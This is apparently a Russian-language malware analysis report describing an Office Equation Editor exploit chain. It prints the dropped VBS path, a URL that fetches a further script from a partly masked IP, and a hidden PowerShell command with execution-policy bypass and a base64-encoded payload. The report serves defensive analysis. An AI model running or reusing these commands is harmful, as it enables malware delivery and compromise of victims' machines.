Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\wegivenbetterthingswithbestpeoplesgivenmebe.vbs"
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\wegivenbetterthingswithbestpeoplesgivenmebe.vbs
Сетевая активность
Подключается к
- '40.##.185.194':80
- 'ar##ive.org':443
TCP
Запросы HTTP GET
- http://40.##.185.194/185/wegivenbetterthingswithbestpeoplesgivenmebest.vbs
Другие
- 'ar##ive.org':443
UDP
- DNS ASK ar##ive.org
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w hidden -noprofile -ep bypass -c "$availments='JGludGVyY29udmVydHMgPSAnVmtGSic7JGNhdGFseXRpY2FsbHkgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRpbnRlcmNvbnZlcnRzKTskcHJld2FyID0gW1N5c3Rl... (со скрытым окном)
